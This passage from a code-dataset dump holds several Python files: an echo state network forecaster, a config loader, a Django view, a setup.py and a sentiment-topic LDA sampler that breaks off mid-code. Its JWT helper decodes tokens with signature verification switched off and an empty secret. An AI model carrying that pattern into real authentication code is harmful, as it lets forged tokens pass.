"call"}, {"api_name": "numpy.matmul", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "360347704", "text": "\"\"\"Handling settings configured within CliEN/config.json\n\"\"\"\nimport sys\n\nif __name__ == \"__main__\":\n sys.exit()\n\nimport os\nimport json\n\n\n# i define this here instead of constants to avoid a circular dependency issue.\n_CLIEN_HOME = os.path.dirname(os.path.abspath(__file__))\n_CONFIG = os.path.join(_CLIEN_HOME, \"config.json\")\n\nconfig = None\n\n\ndef load_config():\n \"\"\"Sanity checks the user settings.\n \"\"\"\n global config\n\n _config = json.load(open(_CONFIG, \"rb\"))\n\n if os.path.isdir(_config[\"PY4J_JAR_DIR_PATH\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: PY4J_DIR_PATH directory is invalid\\n\")\n if os.path.isfile(_config[\"WORD2VEC_BIN_PATH\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: WORD2VEC_BIN_PATH is not a file\\n\")\n if os.path.isfile(_config[\"WORD_FREQ\"]) is False:\n raise Exception(\"\\n\\t\\tERROR: WORD_FREQ is not a faile\\n\")\n\n config = _config\n\nload_config()\n", "sub_path": "clien/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sys.exit", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "229169481", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sparse\nfrom numpy.linalg import eigvals\n\nwork_root = os.environ['WORK']\n\n\n# ESN code\ndef generate_reservoir(size, radius, degree, random_state):\n sparsity = degree / float(size)\n\n A = sparse.rand(size, size, density=sparsity, random_state=random_state).todense()\n vals = eigvals(A)\n e = np.max(np.abs(vals))\n\n # A = sparse.rand(size, size, density=sparsity, random_state=random_state)\n # vals = eigs(A, k=1, which='LM', return_eigenvectors=False)\n # e = np.abs(vals[0])\n # A = A.todense()\n\n A = (A / e) * radius\n return A\n\n\ndef reservoir_layer(A, Win, input, n):\n states = np.zeros((n, input.shape[1]))\n for i in range(input.shape[1] - 1):\n states[:, i + 1] = np.tanh(np.dot(A, states[:, i]) + np.dot(Win, input[:, i]))\n return states\n\n\ndef train(beta, states, data, n, lsp):\n idenmat = beta * sparse.identity(n)\n states2 = states.copy()\n for j in range(2, np.shape(states2)[0] - 2):\n if np.mod(j, 2) == 0:\n states2[j, :] = states[j - 1, :] * states[j - 2, :]\n U = np.dot(states2, states2.transpose()) + idenmat\n Uinv = np.linalg.inv(U)\n Wout = np.dot(Uinv, np.dot(states2, data[lsp:data.shape[0] - lsp, :].transpose()))\n return Wout.transpose()\n\n\nclass ESN:\n def __init__(self, radius=0.1, degree=3, sigma=0.5, approx_res_size=5000, beta=0.0001, random_state=360, lsp=0):\n self._radius = radius\n self._degree = degree\n self._sigma = sigma\n self._approx_res_size = approx_res_size\n self._beta = beta\n self._random_state = random_state\n self._lsp = lsp\n\n self._fn = None\n self._n = None\n self._A = None\n self._Win = None\n self._Wout = None\n\n self.x = None\n\n def fit(self, data):\n self._fn = data.shape[0]\n self._n = int(np.floor(self._approx_res_size / self._fn) * self._fn)\n self._A = generate_reservoir(self._n, self._radius, self._degree, self._random_state)\n\n q = int(self._n / self._fn)\n self._Win = np.zeros((self._n, self._fn))\n for i in range(self._fn): # init input layer\n np.random.seed(seed=i)\n self._Win[i * q: (i + 1) * q, i] = self._sigma * (-1 + 2 * np.random.rand(1, q)[0])\n\n states = reservoir_layer(self._A, self._Win, data, self._n)\n self._Wout = train(self._beta, states, data, self._n, self._lsp)\n self.x = states[:, -1]\n return self\n\n def predict(self, predict_length):\n\n output = np.zeros((self._fn, predict_length))\n out = self.predict_next()\n output[:, 0] = out\n for i in range(1, predict_length):\n out = self.predict_next(out)\n output[:, i] = out\n return output\n\n def predict_next(self, u=None):\n if u is not None:\n x1 = np.tanh(np.dot(self._A, self.x) + np.dot(self._Win, u))\n self.x = np.squeeze(np.asarray(x1))\n x_aug = self.x.copy()\n for j in range(2, np.shape(x_aug)[0] - 2):\n if np.mod(j, 2) == 0:\n x_aug[j] = self.x[j - 1] * self.x[j - 2]\n out = np.squeeze(np.asarray(np.dot(self._Wout, x_aug)), axis=0)\n return out\n\n\ndef split_modulo(start, stop, array_len):\n if stop <= start:\n stop += array_len\n return np.arange(start, stop) % array_len\n\n\ndef load_data(train_length):\n pd_data = pd.read_csv(work_root + '/data/3tier_lorenz_v3.csv', header=None).T\n print(pd_data.shape)\n return np.array(pd_data)[:, :train_length]\n\n\ndef main():\n Q = 8\n g = 8\n q = int(Q / g)\n lsp = 3\n predict_length = 10000\n train_length = 500000\n approx_res_size = 5000\n\n data = load_data(train_length)\n\n splits = list(map(lambda i: data[split_modulo(i * q - lsp, (i + 1) * q + 
lsp, Q), :], range(g)))\n\n fitted_models = list(map(lambda x: ESN(lsp=lsp, approx_res_size=approx_res_size).fit(x), splits))\n\n output_parts = list(map(lambda model: model.predict_next(), fitted_models))\n\n output = np.zeros((Q, predict_length))\n output[:, 0] = np.concatenate(output_parts)\n\n input_parts = np.empty(g, dtype=object)\n for j in range(predict_length):\n output_parts = list(map(lambda model, input_part: model.predict_next(input_part), fitted_models, input_parts))\n output[:, j] = np.concatenate(output_parts)\n input_parts = list(map(lambda i: output[split_modulo(i * q - lsp, (i + 1) * q + lsp, Q), j], range(g)))\n\n print(output.shape)\n np.savetxt(work_root + '/data/Sequential_Expansion_2step_back_' + str(g) + '.txt', output)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/ESN_Sequential.py", "file_name": "ESN_Sequential.py", "file_ext": "py", "file_size_in_byte": 4687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.sparse.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.linalg.eigvals", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.sparse.identity", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 113, "usage_type": "call"}, {"api_name": 
"numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 145, "usage_type": "call"}]}
+{"seq_id": "562072272", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport jwt\nimport redis\n\nfrom pythinkutils.common.log import g_logger\nfrom pythinkutils.config.Config import g_config\nfrom pythinkutils.common.object2json import *\nfrom pythinkutils.redis.ThinkRedis import ThinkRedis\n\nclass TokenUtils:\n\n g_szHost = g_config.get(\"auth\", \"host\")\n JWT_SALT = \"\"\n\n @classmethod\n def auth_token(cls, szAppId, szSecret):\n try:\n szUrl = \"{}{}\".format(TokenUtils.g_szHost, \"/ruoyi-api/auth/token\")\n resp = requests.post(szUrl, data={\"appid\": szAppId, \"secret\": szSecret})\n\n if 200 != resp.status_code:\n return None\n\n dictRet = json.loads(resp.text)\n if 200 != dictRet[\"code\"]:\n return None\n\n return dictRet[\"token\"]\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def get_info(cls, szToken):\n try:\n szUrl = \"{}{}\".format(TokenUtils.g_szHost, \"/ruoyi-api/getInfo\")\n dictHeader = {\n \"Authorization\": \"Bearer {}\".format(szToken)\n }\n\n resp = requests.get(szUrl, headers = dictHeader)\n if 200 != resp.status_code:\n return None\n\n dictRet = json.loads(resp.text)\n if 200 != dictRet[\"code\"]:\n return None\n\n return dictRet\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def parse_token(cls, szToken):\n try:\n jwt_options = {\n 'verify_signature': False,\n 'verify_exp': True,\n 'verify_nbf': False,\n 'verify_iat': True,\n 'verify_aud': False\n }\n\n dictToken = jwt.decode(szToken, TokenUtils.JWT_SALT, algorithms=[\"HS512\"], options=jwt_options)\n return dictToken\n except Exception as ex:\n g_logger.error(ex)\n return None\n\n @classmethod\n def expire_time(cls, szToken):\n try:\n dictToken = cls.parse_token(szToken)\n if dictToken is None:\n return 0\n\n r = redis.StrictRedis(connection_pool=ThinkRedis.get_conn_pool_ex())\n\n szKey = \"login_tokens:{}\".format(dictToken[\"login_user_key\"])\n return r.ttl(szKey)\n\n except Exception as ex:\n g_logger.error(ex)\n return 0\n\n\n# szToken = TokenUtils.auth_token(\"1234\", \"5678\")\n# g_logger.info(szToken)\n#\n# dictRet = TokenUtils.get_info(szToken)\n# g_logger.info(obj2json(dictRet))\n#\n# g_logger.info(obj2json(TokenUtils.parse_token(szToken)))\n# g_logger.info(TokenUtils.expire_time(szToken))\n\n", "sub_path": "pythinkutils/jwt/TokenUtils.py", "file_name": "TokenUtils.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pythinkutils.config.Config.g_config.get", "line_number": 15, "usage_type": "call"}, {"api_name": "pythinkutils.config.Config.g_config", "line_number": 15, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 33, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 54, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 54, "usage_type": "name"}, {"api_name": "jwt.decode", "line_number": 68, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 71, "usage_type": 
"call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 71, "usage_type": "name"}, {"api_name": "redis.StrictRedis", "line_number": 81, "usage_type": "call"}, {"api_name": "pythinkutils.redis.ThinkRedis.ThinkRedis.get_conn_pool_ex", "line_number": 81, "usage_type": "call"}, {"api_name": "pythinkutils.redis.ThinkRedis.ThinkRedis", "line_number": 81, "usage_type": "name"}, {"api_name": "pythinkutils.common.log.g_logger.error", "line_number": 87, "usage_type": "call"}, {"api_name": "pythinkutils.common.log.g_logger", "line_number": 87, "usage_type": "name"}]}
+{"seq_id": "372507681", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom MedApp.models import *\nfrom datetime import datetime\n\n# Create your views here.\n\nTIME_FORMAT = '%Y-%m-%d'\nDAYS = {\n 'Monday' : 'Понедельник',\n 'Tuesday' : 'Вторник',\n 'Wednesday' : 'Среда',\n 'Thursday' : 'Четверг',\n 'Friday' : 'Пятница',\n 'Saturday' : 'Суббота',\n 'Sunday' : 'Воскресенье',\n }\n\ndef journal(request):\n if auth.get_user(request).is_active:\n out_dict = {}\n today = datetime.today().date()\n out_dict['journalapp_active'] = True\n out_dict['User'] = auth.get_user(request)\n out_dict['Clients'] = Client.objects.filter(user_id = auth.get_user(request).id)\n out_dict['ServicesForClients'] = UslugaDlaClienta.objects.filter(user_id = auth.get_user(request).id)\n out_dict['Services'] = Usluga.objects.all()\n out_dict['Today'] = datetime.today().date()\n dates = []\n days_ru = []\n for date in UslugaDlaClienta.objects.filter(user_id = auth.get_user(request).id).order_by('date'):\n if date.date not in dates:\n dates.append(date.date)\n out_dict['Dates'] = dates\n for day in dates:\n if day >= today:\n day_eng = day.strftime('%A')\n day_str = DAYS.get(day_eng)\n days_ru.append(day_str)\n out_dict['DaysRu'] = days_ru\n return render(request, 'journal/journal.html', out_dict)\n else:\n return redirect('/')\n\ndef calculate(request, date):\n return redirect('/calculate/')", "sub_path": "stack_project/Project/journal/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1661, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.contrib.auth.get_user", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 24, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "352516597", "text": "#!/usr/bin/env python\nimport os\n\nfrom setuptools import find_packages, setup\n\ncurdir = os.path.dirname(os.path.abspath(__file__))\n\nsetup(\n name='drf-nested-routers',\n description='Nested resources for the Django Rest Framework',\n long_description=open('README.md').read(),\n license='Apache',\n version='0.11.0',\n author='Alan Justino et al.',\n author_email='alan.justino@yahoo.com.br',\n url='https://github.com/alanjds/drf-nested-routers',\n install_requires=['djangorestframework>=2.4'],\n setup_requires=['setuptools'],\n packages=find_packages(curdir),\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "11285275", "text": "import sys\n\nsys.path.append('G:/anconada/envs/py36/lib/site-packages')\nfrom prettytable import PrettyTable\nimport re\nimport jieba\nimport os\nimport copy\nfrom zhon.hanzi import punctuation\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud\nfrom wordcloud import ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport random\nfrom prettytable import PrettyTable\nimport gc\nimport time\nfrom gensim.models import word2vec\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\n# from guppy import hpy\nimport json\nimport psutil\nfrom gensim import corpora\nfrom scipy.sparse import coo_matrix\nfrom functools import partial\nfrom scipy.special import gammaln, psi\nimport scipy\n\n''' 在写论文的时候可以使用两组数据查看模型的效果'''\n\nclass ldamodel_sent():\n def __init__(self, topic_num, sentiment_num, alpha, beta, gamma,corpus,\n batch_size, iteration,sentiment_dict):\n self.T = topic_num\n self.D = None\n self.S = sentiment_num\n self.V = None\n self.corpus=corpus\n self.wordOccurenceMatrix=None\n\n self.sentiment_dict = sentiment_dict # 这是一个字典,key为word,value为list\n\n # 超参数设置\n self.alpha = alpha if alpha else 0.01\n self.beta = beta if beta else 0.01\n self.gamma = gamma if gamma else 0.01\n self.alpha_lz = None\n self.alphasum_l = None\n self.z_count=None\n self.l_count=None\n\n self.beta_lzw = None\n self.betasum_lz = None\n self.add_lw =None\n\n self.gamma_dl =None\n self.gammasum_d = None\n\n self.iteration = iteration if iteration else 1000\n self.batch_size=batch_size\n self.word2id = None\n self.id2word = None\n\n #\n self.coherence=None\n self.word_sentiment_vocabulary = {}\n self.sentiment_word_list = {}\n \n # 设置参数\n self.doc_sel_topic_count = None\n self.topic_sel_word_count = None\n self.doc_count = None\n self.topic_count = None\n self.sentiment_count = None\n self.topic_sentiment_count = None\n self.sentiment_topic_count=None\n self.sentiment_topic_word_count=None\n self.doc_sentiment_count = None\n self.sentiment_word_count=None\n self.topic_word_count=None\n self.word_sentiment_vocabulary=None\n\n self.doc_sel_topic = None\n self.topic_sel_word = None\n self.sentiment_topic_word=None\n self.doc_sel = None\n\n self.z = None\n self.l = None\n self.all_loglikelihood=[]\n self.all_perplexity=[]\n\n\n def createdictionary(self):\n self.word2id={}\n self.V=0\n self.D=0\n wordnum=0\n for i ,doc in enumerate(self.corpus):\n for j ,word in enumerate(doc):\n if word not in self.word2id.keys():\n if word != '':\n wordnum+=1\n self.word2id[word]=len(self.word2id)\n\n else:\n continue\n\n self.V=wordnum\n self.D=len(self.corpus)\n self.id2word=dict(zip(self.word2id.values(),self.word2id.keys()))\n print('语料库中总共有{0} 个token'.format(self.V))\n print('word2id的长度:',len(self.word2id))\n print('id2word的长度',len(self.id2word))\n\n\n def sampleFromDirichlet(self,gamma):\n return np.random.dirichlet(gamma)\n\n def initial(self):\n self.alpha_lz = np.full((self.S, self.T), fill_value=self.alpha)\n self.alphasum_l = np.full((self.T,), fill_value=self.alpha * self.T)\n\n self.beta_lzw = np.full((self.S, self.T, self.V), fill_value=self.beta)\n self.betasum_lz = np.zeros((self.S, self.T), dtype=np.float)\n self.add_lw = np.ones((self.S, self.V), dtype=np.float)\n\n \n self.wordOccurenceMatrix=np.zeros((self.D,self.V))\n for i,doc in enumerate(self.corpus):\n for j,word in enumerate(doc):\n 
word_id=self.word2id[word]\n self.wordOccurenceMatrix[i,word_id] +=1\n \n for l in range(self.S):\n for z in range(self.T):\n for r in range(self.V):\n self.beta_lzw[l][z][r] *= self.add_lw[l][r]\n self.betasum_lz[l][z] += self.beta_lzw[l][z][r]\n\n self.gamma_dl = np.full((self.D, self.T), fill_value=0.0)\n self.gammasum_d = np.full(shape=(self.D), fill_value=0.0)\n\n for d in range(self.D):\n # self.gamma_dl[d][1] = 1.8\n self.gamma_dl[d][1] = self.gamma\n self.gamma_dl[d][2] = self.gamma\n for d in range(self.D):\n for l in range(self.S):\n self.gammasum_d[d] += self.gamma_dl[d][l]\n self.doc_sel_topic_count = np.zeros([self.D, self.S, self.T])\n print('the shape of doc_Sel_topic_count:',self.doc_sel_topic_count.shape)\n self.topic_sel_word_count = np.zeros([self.T, self.S, self.V])\n self.doc_count = np.zeros(self.D)\n self.sentiment_count = np.zeros(self.S) ##这个不是必须的\n self.topic_count = np.zeros(self.T) ##这个不是必须的\n self.topic_sentiment_count = coo_matrix((self.T, self.S)).toarray()\n self.doc_sentiment_count = coo_matrix((self.D, self.S)).toarray()\n self.sentiment_word_count=coo_matrix((self.S,self.V)).toarray()\n self.topic_word_count=coo_matrix((self.T,self.V)).toarray()\n\n self.sentiment_topic_count = coo_matrix((self.S, self.T)).toarray()\n self.sentiment_topic_word_count =np.zeros([self.S, self.T ,self.V])\n\n self.doc_sel_topic = np.ndarray((self.D, self.S, self.T))\n self.topic_sel_word = np.ndarray((self.T, self.S, self.V))\n self.doc_sel = np.ndarray((self.D, self.S))\n self.sentiment_topic_word=np.ndarray((self.S, self.T,self.V))\n \n\n\n self.z = coo_matrix((self.D, self.V), dtype=np.int8).toarray() # 存放每个文档中每一个词的主题\n self.l = coo_matrix((self.D, self.V), dtype=np.int8).toarray() # 存放每个文档中每个词的情感极性\n self.z_count={}\n self.l_count={}\n print('开始赋予sentiment')\n gamma=[self.gamma for _ in range(self.S)]\n alpha=[self.alpha for _ in range(self.T)]\n for i, doc in enumerate(self.corpus):\n sentimentDistribution = self.sampleFromDirichlet(gamma)\n topicDistribution = np.zeros(( self.S,self.T))\n for s in range(self.S):\n topicDistribution[s, :] = self.sampleFromDirichlet(alpha)\n for j, word in enumerate(doc): \n word_id = int(self.word2id[word])\n sample_sentiment = self.sampleFromCategorical(sentimentDistribution)\n topic = self.sampleFromCategorical(topicDistribution[s,:])\n #topic = int(random.randint(0, self.T - 1))\n prior_sentiment=self.sentiment_dict[word]\n sentiment=self.sentiment_dict[word] # 需要注意的是这个地方随着查看的情感的不同需要一直改变\n\n #final_sentiment=random.sample([prior_sentiment,sentiment],1)[0]\n final_sentiment=prior_sentiment\n self.doc_sel_topic_count[i,final_sentiment,topic] += 1\n #print(sentiment)\n self.topic_sel_word_count[topic,final_sentiment, word_id] += 1\n \n self.doc_count[i] += 1\n self.sentiment_count[final_sentiment] += 1\n self.sentiment_topic_count[final_sentiment,topic]+=1\n self.sentiment_topic_word_count[final_sentiment,topic,word_id]+=1\n\n self.topic_count[topic] += 1\n self.topic_sentiment_count[topic, final_sentiment] += 1\n self.doc_sentiment_count[i, final_sentiment] += 1\n self.sentiment_word_count[final_sentiment,word_id]+=1\n self.topic_word_count[topic,word_id]+=1\n\n self.z_count[(i,j)]=topic\n self.l_count[(i,j)]=final_sentiment\n \n\n\n\n def gibbssampling(self):\n for iter in range(self.iteration):\n # 采用小批量进行训练\n for i, doc in enumerate(self.corpus):\n \n for j, word in enumerate(doc):\n try:\n word_id = int(self.word2id[word])\n topic = int(self.z_count[(i, j)])\n prior_sentiment=self.sentiment_dict[word]\n 
sentiment=self.l_count[(i,j)]\n\n \n \n if self.doc_sel_topic_count[i, sentiment, topic]<=0:\n self.doc_sel_topic_count[i, sentiment, topic]=0\n else:\n self.doc_sel_topic_count[i, sentiment, topic] -= 1\n\n if self.topic_sel_word_count[topic,sentiment, word_id]<=0:\n self.topic_sel_word_count[topic,sentiment, word_id]=0\n else:\n self.topic_sel_word_count[topic,sentiment, word_id] -= 1\n\n if self.topic_sentiment_count[topic, sentiment]<=0:\n self.topic_sentiment_count[topic, sentiment]=0\n else:\n self.topic_sentiment_count[topic, sentiment] -= 1\n\n if self.doc_sentiment_count[i, sentiment]<=0:\n self.doc_sentiment_count[i, sentiment] =0\n else:\n self.doc_sentiment_count[i, sentiment]-=1\n\n if self.topic_count[topic]<=0:\n self.topic_count[topic]=0\n else:\n self.topic_count[topic] -= 1\n\n if self.sentiment_count[sentiment]<=0:\n self.sentiment_count[sentiment]=0\n else:\n self.sentiment_count[sentiment] -=1\n\n if self.topic_word_count[topic,word_id]<=0:\n self.topic_word_count[topic,word_id]=0\n else:\n self.topic_word_count[topic,word_id]-=1\n\n if self.sentiment_word_count[sentiment,word_id]<=0:\n self.sentiment_word_count[sentiment,word_id]=0\n else:\n self.sentiment_word_count[sentiment,word_id]-=1\n \n if self.sentiment_topic_word_count[sentiment,topic,word_id]<=0:\n self.sentiment_topic_word_count[sentiment,topic,word_id]=0\n else:\n self.sentiment_topic_word_count[sentiment,topic,word_id]-=1\n\n if self.sentiment_topic_count[sentiment,topic]<=0:\n self.sentiment_topic_count[sentiment,topic]=0\n else:\n self.sentiment_topic_count[sentiment,topic]-=1\n\n #print('resampling')\n n_dst=self.doc_sel_topic_count[i,:,:]\n n_tsw=self.topic_sel_word_count[:,:,word_id]\n n_ds=self.doc_sentiment_count[i,:]\n n_ts=self.topic_sentiment_count\n n_d=self.doc_count[i]\n \n new_topic, new_sentiment = self.resampling(n_dst,n_tsw,n_ds,n_ts,n_d)\n \n## ind = self.sampleFromCategorical(probabilities_ts.flatten())\n## new_topic, new_sentiment = np.unravel_index(ind, probabilities_ts.shape)\n\n \n self.z_count[(i,j)]=new_topic\n self.l_count[(i,j)]=new_sentiment\n \n \n self.doc_sel_topic_count[i, new_sentiment, new_topic] += 1\n self.topic_sel_word_count[ new_topic,new_sentiment , word_id] += 1\n self.topic_sentiment_count[new_topic, new_sentiment] += 1\n self.doc_sentiment_count[i, new_sentiment] += 1\n self.topic_count[new_topic] += 1\n self.sentiment_count[new_sentiment] += 1\n self.topic_word_count[new_topic,word_id]+=1\n self.sentiment_word_count[new_sentiment,word_id]+=1\n self.sentiment_topic_count[new_sentiment,new_topic]+=1\n self.sentiment_topic_word_count[new_sentiment,new_topic,word_id ]+=1\n \n\n except Exception as result:\n print('result:',result)\n \n if (iter+1)%10 == 0:\n print('开始第{0}次迭代'.format(iter+1))\n self.updateparam()\n print('训练过程结束')\n\n\n def updateparam(self):\n for i in range(self.D):\n for j in range(self.S):\n self.doc_sel[i, j] = (self.doc_sentiment_count[i, j] + 0.01)/(self.doc_count[i] +\n self.S * 0.01)\n\n\n for i in range(self.T):\n for j in range(self.S):\n for k in range(self.V):\n self.topic_sel_word[i, j, k] = (self.topic_sel_word_count[i, j, k] + self.beta_lzw[j][i][k])/\\\n (self.topic_sentiment_count[i, j] + self.betasum_lz[j][i])\n\n for i in range(self.S):\n for j in range(self.T):\n for k in range(self.V):\n self.sentiment_topic_word[i, j, k] = (self.sentiment_topic_word_count[i, j, k] + self.beta_lzw[i][j][k])/\\\n (self.sentiment_topic_count[i, j] + self.betasum_lz[i][j])\n\n for i in range(self.D):\n for j in range(self.S):\n for k in 
range(self.T):\n self.doc_sel_topic[i, j, k] = (self.doc_sel_topic_count[i, j, k] + self.alpha_lz[j][k])/\\\n (self.doc_sentiment_count[i, j] + self.alphasum_l[j] )\n print('参数更新完成******************* \\n')\n return\n\n \n##\n def sampleFromCategorical(self,theta):\n theta = theta/np.sum(theta)\n return np.random.multinomial(1, theta).argmax()\n \n def resampling(self,n_dst,n_tsw,n_ds,n_ts,n_d ):\n pk = np.zeros([self.T, self.S])\n## for t in range(self.T):\n## for s in range(self.S):\n## pk[t,s]= float((self.doc_sel_topic_count[doc_id,s,t] + self.alpha_lz[s,t]) *\\\n## (self.topic_sel_word_count[ t,s,word_id] + self.beta ) * \\\n## (self.doc_sentiment_count[doc_id, s]+ self.gamma) / \\\n## (self.doc_sentiment_count[doc_id, s] + self.alphasum_l[s]) *\\\n## (self.topic_sentiment_count[t,s]+ self.betasum_lz[s,t]) * \\\n## (self.doc_count[doc_id] + self.gammasum_d[doc_id]))\n \n #pk[t, s] += pk[t, s - 1]\n for t in range(self.T):\n for s in range(self.S):\n pk[t,s]= float((n_dst[s,t] + self.alpha) *\\\n (n_tsw[t,s] + self.beta ) * \\\n (n_ds[s]+ self.gamma) / \\\n ( n_ds[s] + self.alpha * self.T) *\\\n (n_ts[t,s]+ self.beta * self.V) * \\\n (n_d + self.gamma * self.S))\n \n \n u = random.random()\n flag=0\n for j in range(self.T):\n for k in range(self.S):\n if pk[j, k] >= u:\n flag=1\n return j,k\n if flag==0:\n se = random.randint(0, self.S - 1)\n to = random.randint(0, self.T - 1)\n return to, se\n## pk /= np.sum(pk)\n## return pk\n\n## def log_multi_beta(self,alpha, K=None):\n## if K is None:\n## # alpha is assumed to be a 